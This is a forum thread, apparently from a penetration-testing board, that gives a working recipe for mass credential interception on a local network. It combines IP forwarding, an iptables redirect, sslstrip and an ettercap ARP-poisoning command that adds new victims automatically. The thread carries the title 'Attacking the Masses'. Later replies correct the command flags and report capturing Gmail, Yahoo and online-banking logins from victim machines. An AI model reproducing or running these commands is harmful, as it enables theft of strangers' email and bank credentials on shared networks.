Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Ettercap & SslStrip (Attacking the Masses)

  1. #1
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Default Ettercap & SslStrip (Attacking the Masses)

    There are a couple of posts in here about using SSLstrip with arpspoof. This is working fine with my BT3 box but it has some drawbacks

    1- Arpspoof works on one target at a time, so if you are on a busy DHCP network, you have to use something like "netdiscover" in the passive mode and manually arpspoof new targets on the run.

    2-You can use:

    # arpspoof -i eth0 -t 192.168.0.255 192.168.0.1

    where you arp spoof the whole C class of your subnet but guess what? The gateway will display an IP conflict warining message.

    3- Arpspoof is compiled with "eth0" as the device to use, even if you use "-i eth1" the attack will fail. You have to modify the arp.c file and compile arpspoof again to make it work on other NIC names or search for a compiled binary that has this issue resolved...

    I would suggest following the following steps ( from the readme file included with the sslstrip package)

    a)Flip your machine into forwarding mode (as root):
    echo "1" > /proc/sys/net/ipv4/ip_forward

    b) Setup iptables to intercept HTTP requests (as root):
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

    c) Run sslstrip with the command-line options you'd like.
    python sslstrip.py -k -p -l <yourListenPort>

    And instead of using arpsoof use ettercap

    d) Run ettercap to redirect traffic to your machine
    ettercap -i eth1 -Tq -M ARP /192.168.0.1/ // // -P autoadd

    We are telling ettercap to use "eth1", with terminal and quiet mode "-Tq" and use the arp poisoning attack "-M ARP". 192.168.0.1 is the gateway IP address and finally we are using the plugin autoadd to add new targets "-P autoadd".

  2. #2
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by htons139 View Post
    3- Arpspoof is compiled with "eth0" as the device to use, even if you use "-i eth1" the attack will fail. You have to modify the arp.c file and compile arpspoof again to make it work on other NIC names or search for a compiled binary that has this issue resolved...
    Just an alternative idea to simplify things - I'm sure that we can rename "eth1/rausb0" to "eth0" with a simple one line command. I did it earlier, but can't remember now. It could be with iwpriv or iwconfig or ifconfig or something simple. Will this 'rename' solve this problem??

  3. #3
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Default

    Quoting from drakoth777
    {
    check out

    /etc/udev/rules.d

    take a look at the network-devices.rules, each nic has it's own mac address that is tied to a certain interface name(eth0, eth1, etc) you can change all that in the network rules file.
    }


    If you get this working, you have to rename the eth0 to something else before renaming eth1 to eth0, on the practical level ettercap is the right tool. Or if arpspoof is easier for you, download the binary available in the forum. Search for "sslstrip & arpspoof"

  4. #4
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Thanks for the reply.... I don't mind using ettercap .... anyway...... for others information, the following code required slight change for me:

    Quote Originally Posted by htons139 View Post

    c) Run sslstrip with the command-line options you'd like.
    python sslstrip.py -K -P -l <yourListenPort>
    It worked as:
    Code:
    python sslstrip.py -k -p -l <yourListenPort>
    So, capital K & P were replaced by lower case.... btw i'm using BT3

  5. #5
    Just burned his ISO htons139's Avatar
    Join Date
    Sep 2008
    Posts
    23

    Default

    Quote Originally Posted by kazalku View Post
    Thanks for the reply.... I don't mind using ettercap .... anyway...... for others information, the following code required slight change for me:



    It worked as:
    Code:
    python sslstrip.py -k -p -l <yourListenPort>
    So, capital K & P were replaced by lower case.... btw i'm using BT3
    welcome and yes, typing mistake, I corrected the initial post. cheers
    In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
    than man-made codes and corruptible devices, there is no such thing as a secret

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Not a problem at all......
    OK, now some feedback on the efficiency of the script. I used BT3 as attacker & Vista Home SP1 as victim. After poisoning, BT3 can successfully capture mail user ID & passwords (like gmail.com, mail.com, yahoo.com) and internet banking ID & password (like lloydsTSB, Barclays, HSBC). However, the victim can't logon to internet bank account, even the 2nd secuirity check page does not come up. So, it seems that our online banking is still safe...... any comments?

  7. #7
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default Patched??

    I think it has been patched in both firefox & ie. Anybody thinks different??
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  8. #8

    Default

    Working for me:
    2009-01-10
    Firefox 3.5, Windows XP SP3
    http://forums.remote-exploit.org/bac...ettercap+https
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  9. #9
    Just burned his ISO
    Join Date
    May 2009
    Posts
    11

    Default

    Quote Originally Posted by kazalku View Post
    Not a problem at all......
    OK, now some feedback on the efficiency of the script. I used BT3 as attacker & Vista Home SP1 as victim. After poisoning, BT3 can successfully capture mail user ID & passwords (like gmail.com, mail.com, yahoo.com) and internet banking ID & password (like lloydsTSB, Barclays, HSBC). However, the victim can't logon to internet bank account, even the 2nd secuirity check page does not come up. So, it seems that our online banking is still safe...... any comments?
    On top of banks (WellsFargo tested here) being secure, there is another "problem" with sslstrip. It should be using a favicon to put a fake "lock" symbol, ala SSL. However, the favicon is not on the web bar and some images have problems being sent to the victim's browser.

    What do banks have running that other SSL sites don't?

  10. #10
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    18

    Default thanks

    after failing with arpspoof - when i have eth1 and it only works with eth0 (otherwise it gives "arpspoof couldn't arp for host" error).

    i tried ettercap and it works like a champ.
    my victim's machine is xp sp3 with ie8. shows gmail accounts, bank accounts etc.

    thanks for posting

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •